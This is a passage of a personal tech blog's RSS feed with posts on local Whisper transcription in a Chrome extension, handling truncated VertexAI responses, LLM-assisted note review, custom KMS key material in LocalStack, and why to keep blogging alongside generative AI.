</content:encoded></item><item><title>A Chrome Extension for Local Transcription Processing</title><link>https://ainoya.dev/posts/chrome-extension-for-edge-transcription/</link><guid isPermaLink="true">https://ainoya.dev/posts/chrome-extension-for-edge-transcription/</guid><description>Developing a secure Chrome extension that transcribes audio locally without uploading data to external servers.</description><pubDate>Wed, 20 Nov 2024 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;img src=&quot;https://ainoya.dev/posts/chrome-extension-for-edge-transcription/images/chrome-extension-web-transcriptor-ai.gif&quot; alt=&quot;Demo&quot; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;This &lt;a href=&quot;https://www.youtube.com/watch?v=Boj9eD0Wug8&quot;&gt;YouTube video&lt;/a&gt; is licensed under CC BY.&lt;/em&gt;&lt;/p&gt;
&lt;h2&gt;Motivation&lt;/h2&gt;
&lt;p&gt;While many transcription tools exist, most require uploading audio files to the cloud for processing. Due to security compliance, I&apos;ve often encountered situations where uploading recorded audio to external servers isn&apos;t permissible. Tools like Siri and the Web Speech API are tailored for transcribing one&apos;s own voice and aren&apos;t suitable for meetings or conversations involving multiple speakers. Moreover, the Web Speech API sends audio data to Google, and its data usage policy isn&apos;t clearly defined. (If anyone knows where this is documented, please let me know: &lt;a href=&quot;https://policies.google.com/privacy?hl=en#infocollect&quot;&gt;Google Privacy Policy&lt;/a&gt;.)&lt;/p&gt;
&lt;p&gt;To address this, I decided to run a Whisper model locally using &lt;a href=&quot;https://github.com/huggingface/transformers.js&quot;&gt;huggingface/transformers.js&lt;/a&gt; for transcription. I developed a Chrome extension called &lt;a href=&quot;https://github.com/ainoya/chrome-extension-web-transcriptor-ai&quot;&gt;chrome-extension-web-transcriptor-ai&lt;/a&gt;. By utilizing the &lt;code&gt;tabCapture&lt;/code&gt; API, capturing audio playing within a tab becomes straightforward. This approach allows for secure transcription entirely on the local machine without any network communication aside from the initial model download, ensuring that audio data isn&apos;t uploaded to external servers.&lt;/p&gt;
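&lt;p&gt;The capture side is only a few lines. This is a rough sketch rather than the extension&apos;s exact code; the downstream processing node is elided:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Capture the active tab&apos;s audio and route it into Web Audio for processing.
chrome.tabCapture.capture({ audio: true, video: false }, (stream) =&amp;gt; {
  const audioCtx = new AudioContext();
  const source = audioCtx.createMediaStreamSource(stream);
  // ...connect `source` to a worklet that buffers Float32Array samples
  // for the Whisper pipeline.
});
&lt;/code&gt;&lt;/pre&gt;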
&lt;h2&gt;Challenges Faced&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;https://ainoya.dev/posts/chrome-extension-for-edge-transcription/images/design.png&quot; alt=&quot;chrome extension implementation&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Initially, I wanted to use the Web Speech API for transcription but found no interface to specify input sources—it seems to accept audio only from input devices like microphones. Since I couldn&apos;t feed the &lt;code&gt;tabCapture&lt;/code&gt; audio into the Web Speech API, I pivoted to using &lt;code&gt;transformers.js&lt;/code&gt;. I plan to dive into the Web Speech API&apos;s implementation when I have time to confirm this limitation.&lt;/p&gt;
&lt;p&gt;Another significant hurdle was that &lt;code&gt;chrome.runtime.sendMessage&lt;/code&gt; can only transmit serializable objects. I struggled with passing audio data because &lt;code&gt;Float32Array&lt;/code&gt; isn&apos;t serializable. Without realizing this, I initially tried to pass it directly, which didn&apos;t work. I ended up converting the &lt;code&gt;Float32Array&lt;/code&gt; to a string using &lt;code&gt;JSON.stringify&lt;/code&gt;, but this approach isn&apos;t efficient. I&apos;m looking into better serialization methods to improve performance.&lt;/p&gt;
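&lt;p&gt;One possible direction, sketched here without having benchmarked it, is to base64-encode the typed array&apos;s underlying bytes instead of stringifying each number:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Untested sketch: ship the raw bytes as base64 rather than a JSON number array.
function encodeAudio(samples /* Float32Array */) {
  const bytes = new Uint8Array(samples.buffer, samples.byteOffset, samples.byteLength);
  let binary = &quot;&quot;;
  for (const b of bytes) binary += String.fromCharCode(b);
  return btoa(binary);
}

function decodeAudio(encoded) {
  const binary = atob(encoded);
  const bytes = Uint8Array.from(binary, (c) =&amp;gt; c.charCodeAt(0));
  return new Float32Array(bytes.buffer);
}
&lt;/code&gt;&lt;/pre&gt;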
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;I&apos;m using the &lt;a href=&quot;https://huggingface.co/onnx-community/whisper-large-v3-turbo&quot;&gt;onnx-community/whisper-large-v3-turbo&lt;/a&gt; model for Whisper. Testing so far has been on a MacBook Pro with an M2 Pro chip (32GB Memory), and it&apos;s capable of high-precision transcription in multiple languages. It&apos;s impressive that such a powerful model can now run on local devices.&lt;/p&gt;
&lt;p&gt;With &lt;code&gt;transformers.js&lt;/code&gt;, it&apos;s possible to run not just Whisper but also large language models (LLMs). I&apos;m considering adding a feature to summarize transcribed content using LLMs. For subsequent processing, integrating with tools like Gemini in Chrome could be beneficial.&lt;/p&gt;
&lt;p&gt;The model download itself does require network communication, so I&apos;m considering a feature that restricts downloads to trusted servers, to further enhance security.&lt;/p&gt;
</content:encoded></item><item><title>Handling Long Responses with VertexAI API</title><link>https://ainoya.dev/posts/vertex-ai-retrieve-continuation/</link><guid isPermaLink="true">https://ainoya.dev/posts/vertex-ai-retrieve-continuation/</guid><description>Learn how to handle truncated responses when processing large contexts with VertexAI API, using a recursive method to retrieve complete outputs.</description><pubDate>Mon, 16 Sep 2024 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;When using generative AI to process large contexts, such as PDFs, the output may sometimes be cut off. This issue is especially common when the generated text is long. In this post, I will explain how to handle this problem using VertexAI, specifically through recursive API calls to obtain the full response.&lt;/p&gt;
&lt;h2&gt;Using &quot;Continue&quot; in Chat UIs&lt;/h2&gt;
&lt;p&gt;In a chat UI with VertexAI, if the output stops prematurely, you can type &quot;continue&quot; and the AI will pick up where it left off. However, when using API calls, you don&apos;t have this interactive capability, so a different approach is needed to handle this issue.&lt;/p&gt;
&lt;h2&gt;Handling the Issue with API Calls&lt;/h2&gt;
&lt;p&gt;To address this problem in API calls, you need to monitor the &lt;code&gt;finishReason&lt;/code&gt; in the response. If the output is cut off, you can check this value and reissue the generation request if necessary. Below is a step-by-step guide on how to handle it.&lt;/p&gt;
&lt;h3&gt;1. Checking the Response&lt;/h3&gt;
&lt;p&gt;Within the API response, there is a &lt;code&gt;finishReason&lt;/code&gt; that indicates why the generation stopped. You need to check this value to determine whether to send another generation request or not.&lt;/p&gt;
&lt;p&gt;Here’s a reference from Google Cloud&apos;s &lt;a href=&quot;https://cloud.google.com/vertex-ai/generative-ai/docs/reference/python/1.59.0/services&quot;&gt;documentation on VertexAI&lt;/a&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;FINISH_REASON_UNSPECIFIED (0):
    The finish reason is unspecified.

STOP (1):
    Natural stop point of the model or provided stop sequence.

MAX_TOKENS (2):
    The maximum number of tokens as specified in the request was reached.
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;2. Retaining Context&lt;/h3&gt;
&lt;p&gt;When reissuing a generation request, it is important to include the context of the conversation, such as previous outputs or input. If this context is not included, the AI may generate text that is unrelated to the previous output.&lt;/p&gt;
&lt;h3&gt;3. Managing Token Count&lt;/h3&gt;
&lt;p&gt;One key point to watch out for is that recursive generation requests will increase the number of input tokens. If the token count becomes too high, it can slow down processing or even hit the token limit. Therefore, it&apos;s important to manage the context carefully, trimming unnecessary parts when possible.&lt;/p&gt;
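&lt;p&gt;One simple trimming strategy is to keep the first turn (which carries the instructions and the source document) plus only the most recent turns. The sketch below assumes the VertexAI-style &lt;code&gt;{ role, parts }&lt;/code&gt; shape; the function name and the &lt;code&gt;keepLast&lt;/code&gt; knob are illustrative, not from any SDK:&lt;/p&gt;

```typescript
// Illustrative trimming of conversation history before reissuing a
// generation request. The Content shape mirrors VertexAI's
// { role, parts } objects.
type Content = { role: string; parts: { text: string }[] };

function trimContents(contents: Content[], keepLast: number): Content[] {
  // Keep the first turn (original instructions and input), then only the
  // most recent keepLast turns; everything in between is dropped.
  const head = contents.slice(0, 1);
  const tail = contents.slice(Math.max(1, contents.length - keepLast));
  return head.concat(tail);
}
```

&lt;p&gt;When the history has no more than &lt;code&gt;keepLast&lt;/code&gt; turns after the first, the function returns it unchanged, so it is safe to call on every iteration.&lt;/p&gt;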
&lt;h2&gt;Code Example&lt;/h2&gt;
&lt;p&gt;Here is a concrete example from a GitHub repository that implements a mechanism to recursively retrieve responses when the output is cut off.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/ainoya/PocketMD/blob/main/src/describe_pdf.ts#L66C15-L98C4&quot;&gt;Code Example&lt;/a&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// https://github.com/ainoya/PocketMD/blob/bd46bf40d83c77bba24f5c46aa64d97e07057f82/src/describe_pdf.ts#L66C15-L98C4

// Define a constant for the word to request continuation of content generation.
// This word is taken from the environment variable `CONTINUE_WORD`, and defaults to &quot;Please continue&quot; if not set.
const continueWord = process.env.CONTINUE_WORD || &quot;Please continue&quot;;

// Set the maximum number of loops to prevent infinite looping during content generation.
const maxLoopCount = 10;
let loopCount = 0;

// Infinite loop to keep generating content until the stop conditions are met.
while (true) {
  // If the loop count exceeds the maximum allowed iterations, break the loop to avoid excessive processing.
  if (loopCount &amp;gt;= maxLoopCount) {
    console.log(&quot;Max loop count reached&quot;);
    break;
  }

  // Increment the loop counter on each iteration.
  loopCount++;

  // Log to indicate the content generation process has started.
  console.log(&quot;Generating content...&quot;);

  // Send a request to the API client to generate content based on the existing conversation context.
  const generated = await client.generateContent({
    contents: contents,
  });

  // Extract the content from the response, assuming it&apos;s in the first candidate.
  const content = generated.response.candidates?.at(0)?.content;

  // If content is successfully generated, add it to the existing conversation context.
  if (content) {
    contents.push(content); // Add the generated content to the conversation context.

    // Add a user input asking the model to continue generating content, using the defined continue word.
    contents.push({ role: &quot;user&quot;, parts: [{ text: continueWord }] });
  } else {
    // If no content was generated, log a message and break the loop.
    console.log(&quot;No content generated&quot;);
    break;
  }

  // Check the reason why the generation stopped (e.g., reaching token limit, completion).
  const finishReason = generated.response.candidates?.at(0)?.finishReason;

  // If the reason for stopping is not due to reaching the maximum token limit, break the loop.
  // This means the content is considered &quot;finished&quot; or some other stop condition has occurred.
  if (finishReason !== &quot;MAX_TOKENS&quot;) {
    console.log(&quot;Finish reason:&quot;, generated.response.candidates?.at(0)?.finishReason);
    break;
  }
}
&lt;/code&gt;&lt;/pre&gt;
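&lt;p&gt;One detail the snippet leaves implicit: once the loop ends, &lt;code&gt;contents&lt;/code&gt; interleaves the model&apos;s output with the injected &quot;Please continue&quot; user turns, so the final text has to be stitched together from the model-role entries only. A minimal sketch, assuming the SDK marks responses with &lt;code&gt;role: &quot;model&quot;&lt;/code&gt;:&lt;/p&gt;

```typescript
// Assemble the full generated text from the accumulated conversation,
// skipping the injected user-role "continue" prompts. Assumes responses
// carry role "model", as in the VertexAI SDK's { role, parts } shape.
type Content = { role: string; parts: { text: string }[] };

function assembleResponse(contents: Content[]): string {
  const pieces: string[] = [];
  for (const content of contents) {
    if (content.role === "model") {
      for (const part of content.parts) {
        pieces.push(part.text);
      }
    }
  }
  return pieces.join("");
}
```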
&lt;h2&gt;Key Considerations&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Context Retention&lt;/strong&gt;: When reissuing a generation request, always include the previous conversation history. If you fail to do this, the AI may not generate the continuation you expect.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Token Management&lt;/strong&gt;: Be mindful of the token count when recursively generating responses. To avoid hitting limits, trim unnecessary parts of the conversation history when possible.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;By carefully monitoring the &lt;code&gt;finishReason&lt;/code&gt; and managing the context and token count, you can effectively handle the issue of truncated responses in API-based content generation.&lt;/p&gt;
</content:encoded></item><item><title>Experiment with LLM for Personal Knowledge Management</title><link>https://ainoya.dev/posts/try-llm-personal-knowledge-management-weekly-review/</link><guid isPermaLink="true">https://ainoya.dev/posts/try-llm-personal-knowledge-management-weekly-review/</guid><description>Exploring the use of Large Language Models (LLMs) for personal knowledge management, focusing on the challenges and potential solutions for improving output quality and automation.</description><pubDate>Sun, 15 Sep 2024 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Recently, I&apos;ve been experimenting with using Large Language Models (LLMs) for personal knowledge management. However, I&apos;ve found that even when I feed information into an LLM, the output often falls within my own limited range of imagination. On the other hand, LLMs excel at summarizing and organizing diverse information compared to humans. My goal is to leverage these strengths to enhance my intellectual productivity.&lt;/p&gt;
&lt;h2&gt;Approach Overview&lt;/h2&gt;
&lt;h3&gt;1. Human-Driven Information Dump&lt;/h3&gt;
&lt;p&gt;First, I write down all the miscellaneous information I acquire into notes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Record thoughts and ideas in a &lt;strong&gt;Daily Journal&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Save interesting web articles and resources.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;2. LLM-Driven Information Organization&lt;/h3&gt;
&lt;p&gt;Next, I use an LLM to organize and summarize this information:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Generate summarized files.&lt;/li&gt;
&lt;li&gt;Implement LLM-based tagging.&lt;/li&gt;
&lt;li&gt;Enclose important keywords with links.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I believe that the interplay between these two steps can lead to more efficient intellectual activity.&lt;/p&gt;
&lt;h2&gt;Methods Tried&lt;/h2&gt;
&lt;p&gt;Previously, I experimented with tagging. The knowledge management technique of linking ideas is called &lt;a href=&quot;https://www.linkingyourthinking.com/&quot;&gt;Linking Your Thinking (LYT)&lt;/a&gt;. This time, I decided to try a prompt that more organically summarizes weekly notes and organizes next actions. I&apos;m using OpenAI&apos;s &lt;strong&gt;o1-preview&lt;/strong&gt; model, which has more advanced reasoning capabilities.&lt;/p&gt;
&lt;h3&gt;Prompt Used&lt;/h3&gt;
&lt;p&gt;Here is the prompt I actually used:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;You are a research assistant for personal knowledge management. You will search a directory containing notes. Summarize the results and consider and suggest the next actions to develop the thinking process.

Consider original and novel research topics. Limit the topics to the field of computer science. For each topic, develop a detailed research plan, including hypotheses, verification methods, expected conclusions, and how it differs from existing research.

In addition, by looking back at the content, please tell me the knowledge gaps that I am currently lacking.
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Search Command and Results&lt;/h3&gt;
&lt;p&gt;I used the following command to search for notes:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;find . -type f -name &quot;*.md&quot; -mtime -7 -exec sh -c &apos;for file; do echo &quot;&amp;lt;File path=\&quot;$file\&quot;&amp;gt;\n&quot;; cat &quot;$file&quot;; echo &quot;\n&amp;lt;/File&amp;gt;&quot;; done&apos; _ {} +
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Results and Challenges&lt;/h2&gt;
&lt;p&gt;When I actually ran the prompt, the output did not satisfy me, and the process has not yet reached a point where it can be automated. Still, by asking follow-up questions, I find it useful for weekly reviews and introspection.&lt;/p&gt;
&lt;h3&gt;Challenges&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Output Quality&lt;/strong&gt;: The results obtained from the LLM have not met my expectations.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automation Difficulty&lt;/strong&gt;: I have not been able to establish an automated process because I cannot get satisfactory results.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;LLM-powered knowledge management shows promise, but there are still many challenges at this stage. In particular, further consideration needs to be given to prompt design to improve the quality of output and how to maximize the capabilities of LLMs. I will continue to experiment and try to establish more effective knowledge management methods.&lt;/p&gt;
&lt;h2&gt;References&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;https://www.arxiv.org/abs/2409.04109&quot;&gt;[2409.04109] Can LLMs Generate Novel Research Ideas? A Large-Scale Human Study with 100+ NLP Researchers&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;This paper investigates whether LLMs can generate novel research ideas by comparing research ideas generated by LLMs and human NLP researchers. The study found that LLM-generated ideas were judged to be more novel than those of human experts, while being judged as slightly less feasible. To generate ideas at scale, the paper employed an approach where the LLM generated 4000 ideas for a single research topic. This &quot;large-scale generation&quot; aimed to produce a larger pool of candidate ideas from which high-quality ideas could be selected.&lt;/p&gt;
&lt;p&gt;However, it was found that only about 5% (200) of the 4000 ideas were truly unique and non-duplicate. As the generation process continued, the number of duplicate ideas increased, and the number of new ideas decreased. This demonstrates that large-scale generation has limitations as the diversity of ideas gradually diminishes.&lt;/p&gt;
&lt;p&gt;IMO: It&apos;s interesting that 200 unique ideas were generated.&lt;/p&gt;
</content:encoded></item><item><title>Using Custom Key Material with KMS in LocalStack</title><link>https://ainoya.dev/posts/localstack-kms-with-seed/</link><guid isPermaLink="true">https://ainoya.dev/posts/localstack-kms-with-seed/</guid><description>Learn how to set up custom key material when creating KMS keys in LocalStack, simplifying key preparation and enhancing team collaboration.</description><pubDate>Sat, 14 Sep 2024 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Introduction&lt;/h2&gt;
&lt;p&gt;In development projects that utilize AWS components, &lt;strong&gt;LocalStack&lt;/strong&gt; is an incredibly handy tool. By running a single LocalStack container, you can emulate various AWS services, including &lt;strong&gt;KMS (Key Management Service)&lt;/strong&gt;, which is particularly useful.&lt;/p&gt;
&lt;p&gt;In this post, I&apos;ll walk you through how to set up custom key material when creating KMS keys in LocalStack. This approach simplifies key preparation and is especially beneficial when sharing encrypted test data in a team environment.&lt;/p&gt;
&lt;h2&gt;Background&lt;/h2&gt;
&lt;p&gt;When storing sensitive customer information—like API keys for services they own—encrypting this data with KMS is a common practice. However, in a team development setting, a problem arises: each team member&apos;s KMS initializes with different key material, making it impossible to decrypt each other&apos;s encrypted test data.&lt;/p&gt;
&lt;p&gt;One way to address this is by importing key material using &lt;strong&gt;&lt;code&gt;aws kms import-key-material&lt;/code&gt;&lt;/strong&gt;, but this process can be a bit cumbersome. Recently, it became possible to create keys with custom key material directly using &lt;strong&gt;&lt;code&gt;awslocal kms create-key&lt;/code&gt;&lt;/strong&gt; in LocalStack. This new method streamlines the key preparation steps and improves development efficiency.&lt;/p&gt;
&lt;h2&gt;Step-by-Step Guide&lt;/h2&gt;
&lt;p&gt;Here&apos;s how you can set up custom key material when creating a KMS key in LocalStack. I recommend fixing the &lt;code&gt;keyId&lt;/code&gt; for easier handling in scripts.&lt;/p&gt;
&lt;h3&gt;1. Set Up Custom Key Material and Key ID&lt;/h3&gt;
&lt;p&gt;Generate a 32-byte random key material and define a fixed key ID:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CUSTOM_KEY_MATERIAL=&quot;$(openssl rand -base64 32)&quot;
CUSTOM_ID=&quot;00000000-0000-0000-0000-000000000001&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;CUSTOM_KEY_MATERIAL&lt;/code&gt;&lt;/strong&gt;: Generates a random 32-byte key material.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;CUSTOM_ID&lt;/code&gt;&lt;/strong&gt;: Sets a fixed key ID.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;2. Create the Key&lt;/h3&gt;
&lt;p&gt;Use the &lt;code&gt;awslocal&lt;/code&gt; command to create a key with custom key material:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;awslocal kms create-key --tags &quot;[{\&quot;TagKey\&quot;:\&quot;_custom_key_material_\&quot;,\&quot;TagValue\&quot;:\&quot;$CUSTOM_KEY_MATERIAL\&quot;},{\&quot;TagKey\&quot;:\&quot;_custom_id_\&quot;,\&quot;TagValue\&quot;:\&quot;$CUSTOM_ID\&quot;}]&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;This command creates a new KMS key with the custom key material and key ID specified in the tags.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Important Notes&lt;/h2&gt;
&lt;h3&gt;Key Material Size&lt;/h3&gt;
&lt;p&gt;The key material must be a Base64 string that decodes to &lt;strong&gt;32 bytes&lt;/strong&gt;. If you pass a value that isn&apos;t valid Base64 at all, you&apos;ll encounter an error like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;## This will result in an error

CUSTOM_KEY_MATERIAL=&quot;invalid material&quot;
CUSTOM_ID=&quot;00000000-0000-0000-0000-000000000001&quot;

awslocal kms create-key --tags &quot;[{\&quot;TagKey\&quot;:\&quot;_custom_key_material_\&quot;,\&quot;TagValue\&quot;:\&quot;$CUSTOM_KEY_MATERIAL\&quot;},{\&quot;TagKey\&quot;:\&quot;_custom_id_\&quot;,\&quot;TagValue\&quot;:\&quot;$CUSTOM_ID\&quot;}]&quot; --cli-binary-format raw-in-base64-out

## Error Message
An error occurred (InternalError) when calling the CreateKey operation (reached max retries: 2): exception while calling kms.CreateKey: Incorrect padding
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Key Material Format&lt;/h3&gt;
&lt;p&gt;Ensure the key material is in &lt;strong&gt;Base64-encoded&lt;/strong&gt; format. If you use a hex string, you&apos;ll face errors during encryption:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;## This will also result in an error

CUSTOM_KEY_MATERIAL=&quot;$(openssl rand -hex 32)&quot;
CUSTOM_ID=&quot;00000000-0000-0000-0000-000000000001&quot;

awslocal kms create-key --tags &quot;[{\&quot;TagKey\&quot;:\&quot;_custom_key_material_\&quot;,\&quot;TagValue\&quot;:\&quot;$CUSTOM_KEY_MATERIAL\&quot;},{\&quot;TagKey\&quot;:\&quot;_custom_id_\&quot;,\&quot;TagValue\&quot;:\&quot;$CUSTOM_ID\&quot;}]&quot; --cli-binary-format raw-in-base64-out

awslocal kms encrypt --key-id $CUSTOM_ID --plaintext supersecret --output text --query CiphertextBlob --cli-binary-format raw-in-base64-out

## Error Message
An error occurred (InternalError) when calling the Encrypt operation (reached max retries: 2): exception while calling kms.Encrypt: Invalid key size (384) for AES.
&lt;/code&gt;&lt;/pre&gt;
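&lt;p&gt;The 384 in that error message falls out of the arithmetic: the tag value gets Base64-decoded, and the 64-character string produced by &lt;code&gt;openssl rand -hex 32&lt;/code&gt; happens to be valid Base64 too, decoding to 48 bytes (384 bits) instead of 32. A quick check of the decoded lengths in Node.js:&lt;/p&gt;

```typescript
// Why the hex key material fails: hex digits are all valid Base64
// characters, so a 64-character hex string Base64-decodes without error,
// but to 48 bytes (384 bits), matching "Invalid key size (384) for AES".
const hexMaterial = "ab".repeat(32); // 64 chars, like `openssl rand -hex 32`
const misread = Buffer.from(hexMaterial, "base64");
console.log(misread.length * 8); // 384

// Proper Base64 material, like `openssl rand -base64 32`, decodes to 32 bytes.
const goodMaterial = Buffer.alloc(32).toString("base64");
console.log(Buffer.from(goodMaterial, "base64").length); // 32
```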
&lt;h3&gt;AWS CLI Option&lt;/h3&gt;
&lt;p&gt;If you&apos;re using &lt;strong&gt;AWS CLI v2&lt;/strong&gt;, you&apos;ll need to specify the &lt;code&gt;--cli-binary-format raw-in-base64-out&lt;/code&gt; option; otherwise, you&apos;ll get an error like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;## This will result in an error

awslocal kms encrypt --key-id $CUSTOM_ID --plaintext supersecret --output text --query CiphertextBlob

## Error Message
Invalid base64: &quot;supersecret&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Refer to the &lt;a href=&quot;https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-options.html&quot;&gt;AWS CLI options documentation&lt;/a&gt; for more details.&lt;/p&gt;
&lt;h2&gt;Testing Encryption and Decryption&lt;/h2&gt;
&lt;h3&gt;Encrypt Data&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;PLAINTEXT=&quot;supersecret&quot;

CIPHERTEXT=$(awslocal kms encrypt --key-id $CUSTOM_ID --plaintext &quot;$PLAINTEXT&quot; --output text --query CiphertextBlob --cli-binary-format raw-in-base64-out)

echo &quot;Ciphertext: $CIPHERTEXT&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Decrypt Data&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;DECRYPTED_TEXT=$(awslocal kms decrypt --ciphertext-blob fileb://&amp;lt;(echo &quot;$CIPHERTEXT&quot; | base64 -d) --output text --query Plaintext --cli-binary-format raw-in-base64-out | base64 -d)

echo &quot;Decrypted text: $DECRYPTED_TEXT&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Expected Output&lt;/strong&gt;: &lt;code&gt;Decrypted text: supersecret&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;By using custom key material when creating KMS keys in LocalStack, you can simplify key preparation and make it easier to share encrypted test data within your team.&lt;/p&gt;
&lt;h3&gt;Key Takeaways&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;Key Material Format: The key material must conform to the allowed data key byte sizes.&lt;/li&gt;
&lt;/ol&gt;
&lt;blockquote&gt;
&lt;p&gt;Specifies the length of the data key in bytes. For example, use the value 64 to generate a 512-bit data key (64 bytes is 512 bits). For 128-bit (16-byte) and 256-bit (32-byte) data keys, use the KeySpec parameter.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;a href=&quot;https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/kms/client/generate_data_key.html&quot;&gt;generate_data_key - Boto3 1.35.24 documentation&lt;/a&gt;&lt;/p&gt;
&lt;ol start=&quot;2&quot;&gt;
&lt;li&gt;
&lt;p&gt;When using AWS CLI v2, always include the &lt;code&gt;--cli-binary-format raw-in-base64-out&lt;/code&gt; option.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Fixing the &lt;code&gt;keyId&lt;/code&gt; makes scripting and automation more straightforward.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;References&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.localstack.cloud/user-guide/aws/kms/&quot;&gt;Custom Key Material for KMS Keys via Tags&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-options.html&quot;&gt;Command Line Options - AWS CLI&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>Why Still Blog in the Age of Generative AI?</title><link>https://ainoya.dev/posts/why-you-are-still-blogging/</link><guid isPermaLink="true">https://ainoya.dev/posts/why-you-are-still-blogging/</guid><description>Generative AI is changing the information landscape, but blogging still holds value as a platform for personal expression and creative exploration.</description><pubDate>Wed, 04 Sep 2024 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;The Rise of Generative AI and the Information Explosion&lt;/h2&gt;
&lt;p&gt;The advent of generative AI has ushered in an era of unprecedented information output. This impact is particularly evident in the academic world, where the number of papers published on platforms like arXiv is skyrocketing.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://ainoya.dev/posts/why-you-are-still-blogging/images/arxiv-monthly-submission.png&quot; alt=&quot;arXiv monthly submissions&quot; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://arxiv.org/stats/monthly_submissions&quot;&gt;Monthly Submissions&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The graph above illustrates the monthly submission count to arXiv. The red line represents an exponential approximation, hinting at the continued growth of submissions in the future.&lt;/p&gt;
&lt;p&gt;An interesting example is the recent surge in the use of the word &quot;delve&quot; in academic papers, a term not commonly used in everyday language.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://ainoya.dev/posts/why-you-are-still-blogging/images/delve-freq.png&quot; alt=&quot;delve usage in academic papers&quot; /&gt;&lt;/p&gt;
&lt;p&gt;This phenomenon is attributed to the tendency of LLMs like ChatGPT to generate this word frequently.
(&lt;a href=&quot;https://arxiv.org/abs/2406.07016&quot;&gt;[2406.07016] Delving into ChatGPT usage in academic writing through excess vocabulary&lt;/a&gt;)&lt;/p&gt;
&lt;p&gt;Evidence suggests that ChatGPT is being used to assist in writing papers submitted to arXiv. This increased productivity through LLM-powered writing is expected to further boost the number of future publications.&lt;/p&gt;
&lt;h2&gt;ChatGPT and Information Access&lt;/h2&gt;
&lt;p&gt;Even for technical information, ChatGPT can provide high-quality answers without the annoyance of intrusive ads. If the information doesn&apos;t exist directly on the internet but can be interpolated from existing data, ChatGPT can likely generate it for you.&lt;/p&gt;
&lt;h2&gt;Why Bother Blogging Then?&lt;/h2&gt;
&lt;p&gt;Given this context, what is the point of writing technical blogs?&lt;/p&gt;
&lt;p&gt;Even extrapolative thinking, the ability to generate new ideas beyond existing information, could potentially be replaced by AI agents. Imagine a scenario: &quot;encounter a bug → search on Perplexity → fix the bug → report the fix.&quot;  This entire process could be automated by AI agents in the future. For example: &lt;a href=&quot;https://githubnext.com/projects/copilot-workspace&quot;&gt;GitHub Next | Copilot Workspace&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;If we focus solely on doing things that only humans can do, we might eventually find ourselves replaced by AI in every domain. Instead, we should view &lt;strong&gt;blogging as a means of personal expression, akin to poetry or art&lt;/strong&gt;.
The goal shouldn&apos;t be to compete with AI, but rather to &lt;strong&gt;leverage blogging as a tool for expressing our unique thoughts and perspectives.&lt;/strong&gt;&lt;/p&gt;
